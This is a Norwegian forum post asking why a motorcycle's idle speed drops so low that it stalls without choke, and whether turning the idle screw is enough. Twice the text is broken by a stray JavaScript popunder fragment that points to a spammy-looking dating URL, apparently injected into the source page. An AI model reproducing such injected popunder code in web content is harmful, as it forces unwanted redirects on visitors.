Jeg var ute og kjørte en kort tur i går etter en litt for lang pause i sommer og merket den hadde utrolig lavt turtall hver gang jeg slapp opp gassen. Det være seg bremsing foran en rundkjøring eller "trille-kjøring" i nedoverbakke (hvor jeg ikke gir noe gass, men heller ikke har clutch inne). Midt under turen kvelte også motoren seg av hvor lavt turtallet var. Siden jeg var i fart fikk jeg kickstartet den igjen og endte opp med å ha på litt choke resten av turen, men ikke akkurat fornøyd med den løsningen...
Det jeg nå lurer på er om det er et underliggende problem for dette, eller om alt handler om å skru til tomgangskruen litt. Jeg vet jeg var borte på denne i vår da jeg hadde startproblemer, men husker selvfølgelig ikke hvor mye jeg skrudde osv.
Her er en "før"-video hvor jeg slår av choke og turtallet går så lavt at den sliter, slik som på turen i går. Jeg har latt motoren gå i 4-5 min før videoen.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Her er en "etter"-video hvor jeg har fått tomgang RPM uten choke til rundt 1500. Her synes jeg fortsatt motoren lager litt pussig lyd i forhold til hva jeg husker fra tidligere, nesten som jeg hører fuskingen fra forrige video fortsatt. Overanalyserer jeg veldig, nå?
![Hmmm :-k](./images/smilies/tenker.gif)
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Som en FYI: Da jeg hadde startproblemer i vår demonterte jeg meg ned hit, men ikke lenger (bilde). Problemet den gang var relatert til bensinpumpe og startrele. Som alltid, beklager mine fagspråk-mangler
![Rødmer :redface](./images/smilies/blush.gif)